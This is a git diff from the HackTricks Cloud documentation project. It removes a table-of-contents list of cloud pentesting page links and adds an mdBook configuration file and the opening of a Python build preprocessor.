Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md) - * [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md) - * [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md) - * [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md) - * [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md) - * [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) - * [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md) - * [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md) - * [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md) - * [AWS - S3 Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md) - * [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md) - * [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md) - * [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md) - * [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md) - * [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md) - * [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md) - * [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md) - * [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md) - * [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md) - * [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md) - * [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md) - * [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md) - * [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md) - * [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md) - * [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md) - * [iam:PassRole, codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md) - * [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md) - * [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md) - * [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md) - * [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md) - * [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md) - * [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md) - * [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md) - * [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md) - * [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md) - * [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md) - * [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md) - * [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md) - * [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md) - * [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md) - * [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md) - * [AWS - Glue Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md) - * [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md) - * [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md) - * [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md) - * [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md) - * [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md) - * [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md) - * [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md) - * [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md) - * [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md) - * [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) - * [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md) - * [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md) - * [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md) - * [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md) - * [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md) - * [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md) - * [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md) - * [AWS - SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md) - * [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md) - * [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md) - * [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md) - * [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md) - * [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md) - * [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md) - * [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md) - * [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md) - * [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md) - * [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md) - * [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md) - * [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md) - * [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md) - * [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md) - * [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md) - * [AWS - Security Hub Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md) - * [AWS - Shield Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md) - * [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md) - * [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md) - * [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md) - * [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md) - * [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md) - * [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md) - * [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md) - * [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md) - * [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md) - * [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md) - * [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md) - * [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) - * [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md) - * [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md) - * [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md) - * [AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md) - * [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md) - * [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md) - * [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md) - * [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md) - * [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md) - * [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md) - * [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md) - * [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md) - * [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md) - * [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md) - * [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md) - * [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md) - * [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md) - * [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md) - * [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md) - * [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md) - * [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md) - * [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md) - * [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md) - * [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md) - * [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md) - * [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md) - * [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md) - * [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md) - * [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md) - * [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md) - * [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md) - * [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md) - * [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md) - * [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md) - * [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md) - * [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md) - * [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) - * [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) - * [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) - * [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md) - * [AWS - DynamoDB Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md) - * [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md) - * [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) - * [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) - * [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md) - * [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md) - * [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md) - * [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md) - * [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md) - * [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md) - * [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md) - * [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md) - * [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) - * [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md) - * [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md) - * [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md) - * [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) - * [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) - * [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md) -* [Azure Pentesting](pentesting-cloud/azure-security/README.md) - * [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md) - * [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md) - * [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md) - * [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md) - * [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md) - * [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) - * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) - * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) - * [Az - Services](pentesting-cloud/azure-security/az-services/README.md) - * [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md) - * [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md) - * [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md) - * [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) - * [Az - Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md) - * [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md) - * [Az - App Services](pentesting-cloud/azure-security/az-services/az-app-services.md) - * [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md) - * [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md) - * [Az - Function Apps](pentesting-cloud/azure-security/az-services/az-function-apps.md) - * [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md) - * [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md) - * [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md) - * [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md) - * [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md) - * [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md) - * [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md) - * [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md) - * [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md) - * [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md) - * [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md) - * [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md) - * [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md) - * [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md) - * [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md) - * [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md) - * [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md) - * [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md) - * [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md) - * [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md) - * [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md) - * [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md) - * [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md) - * [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md) - * [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md) - * [Az - Phishing Primary Refresh Token (Microsoft Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) - * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) - * [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) - * [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) - * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - * [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) - * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) - * [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) - * [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md) - * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) - * [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md) - * [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md) - * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) - * [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) - * [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md) - * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) - * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) - * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) - * [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) - * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) - * [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) - * [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) - * [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) - * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) - * [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md) - * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) - * [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md) - * [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md) - * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) - * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) -* [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md) - * [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md) - * [DO - Permissions for a Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md) - * [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md) - * [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md) - * [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md) - * [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md) - * [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md) - * [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md) - * [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md) - * [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md) - * [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md) - * [DO - Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md) - * [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md) - * [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md) -* [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md) - * [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md) - * [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md) - * [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md) -* [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md) - * [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md) - * [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md) - * [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md) - * [OpenShift - Jenkins Build Pod Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md) - * [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md) - * [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md) - * [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md) - * [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md) - -## 🛫 Pentesting Network Services - -* [HackTricks Pentesting Network](https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network) -* [HackTricks Pentesting Services](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh) diff --git a/book.toml b/book.toml new file mode 100644 index 000000000..4add3bde9 --- /dev/null +++ b/book.toml @@ -0,0 +1,44 @@ +[book] +authors = ["Carlos Polop"] +language = "en" +multilingual = false +src = "src" +title = "HackTricks Cloud" + +[build] +create-missing = false +extra-watch-dirs = ["translations"] + +[preprocessor.alerts] +after = ["links"] + +[preprocessor.reading-time] + +[preprocessor.pagetoc] + +[preprocessor.tabs] + +[preprocessor.codename] + +[preprocessor.hacktricks] +command = "python3 ./hacktricks-preprocessor.py" + +[output.html] +additional-css = ["theme/pagetoc.css", "theme/tabs.css"] +additional-js = [ + "theme/pagetoc.js", + "theme/tabs.js", + "theme/ht_searcher.js", + "theme/sponsor.js", +] +no-section-label = true +preferred-dark-theme = "hacktricks-dark" +default-theme = "hacktricks-light" + +[output.html.fold] +enable = true # whether or not to enable section folding +level = 0 # the depth to start folding + + +[output.html.print] +enable = false # whether or not to enable print diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py new file mode 100644 index 000000000..56a0cf0dc --- /dev/null +++ b/hacktricks-preprocessor.py @@ -0,0 +1,106 @@ +import json +import sys +import re +import logging +from os import path +from urllib.request import urlopen, Request + +logger = logging.getLogger(__name__) +logging.basicConfig(filename='hacktricks-preprocessor.log', filemode='w', encoding='utf-8', level=logging.DEBUG) + + +def findtitle(search ,obj, key, path=(),): + # logger.debug(f"Looking for {search} in {path}") + if isinstance(obj, dict) and key in obj and obj[key] == search: + return obj, path + 